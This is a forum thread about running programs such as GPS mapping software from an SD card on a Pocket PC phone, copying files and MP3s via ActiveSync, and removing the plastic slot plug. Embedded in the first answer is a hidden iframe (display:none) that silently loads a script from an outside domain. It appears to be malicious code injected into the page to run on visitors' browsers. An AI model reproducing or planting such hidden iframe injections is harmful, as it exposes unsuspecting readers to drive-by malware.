+ Reply to Thread
    Editor and Site Administrator Convergent's Avatar

Can you actually run programs from an SD card?

The only thing I have been able to do is store files on the SD card. Can you actually run programs such as AOL IM or the GPS program from the SD card?

Answer:
    Absolutely you can run programs from an SD card, but there are some limitations to consider. First, not all applications will work from an SD card. In general, I've found that system utilities and communications programs tend to be the ones that have the most trouble being on a card. But, these are usually not that large so this isn't a problem. Another consideration is that if you install applications on your SD card, then you most likely will not want to swap the card out for another one. Therefore, it would be advisable to get a larger card if you want to install applications to it. As for GPS, I have run several GPS Mapping packages from the SD card. In particular, I can say that Mapopolis works in this way.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Mike - Been Converged?

Question SD Card

Does the Samsung I700 come with an SD Card, or is that just a blank plate in the slot? Also, how do i save a file to the SD card?

delid2@comcast.net

Lightbulb mmc slot

Yes, the slot has a plastic peice in it, as a "plug". I could not get mine out until I accidently dropped the phone/pda/camera. Anyway, there is another thread that shows the cheapest <460 meg> card at $100 from sears -- last day of sale is 12/2!! The MMC slot can be used for programs / data, OR a 802.11b WiFi network card. The one's I've seen stick out about 1/2 an inch or so...

To save files -- just use your PC with ActiveSync (BTW, you need one of the latest versions -- it can be downloaded from Microsoft for free)... Once ActiveSync is installed, and your phone connected to the USB port -- you will see a Mobile Device in My Computer -- this is where you drop files in -- Most Pocket PC Programs actually have an install process, though...

Hope this helps...
    Michael

Question MP3 Copying to SD RAM

Can I copy MP3 files directly to the SD card?

I currently am using active sync to get them into the My Documents directory and then File Manager to move them to the SD card. Is there a better way?

Mark
    Nothing is impossible.

SD Card Slot

Thanks for replying mkobzina, I don't know if you noticed but the question i about the SD card slot plug was posted on Sept 9, 2003. Almost 9 months ago. (laughing) Better late than never though, huh?

I play my MP3 files directly from the SD card with no problem.

I haven't tried directly executable files yet; I'll let you know.
    Nothing is impossible.